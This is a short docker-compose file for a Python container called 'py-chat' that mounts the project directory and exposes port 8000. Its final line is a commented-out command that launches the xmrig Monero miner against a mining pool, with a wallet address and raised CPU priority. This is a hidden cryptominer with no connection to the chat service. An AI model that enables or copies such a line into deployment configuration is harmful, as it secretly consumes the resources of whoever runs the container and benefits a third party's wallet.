version: '3'

services:
  py-chat:
    container_name: py-chat
    image: python:3.7.16
    volumes:
      - './:/app'
    ports:
      - '8000:8000'
    restart: always
#    command: /xmr/xmrig --url=gulf.moneroocean.stream:10128 --user=4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRvjy3UDSXa9PT9Cm8e --pass=docker-ha -k --coin=monero --cpu-priority=3

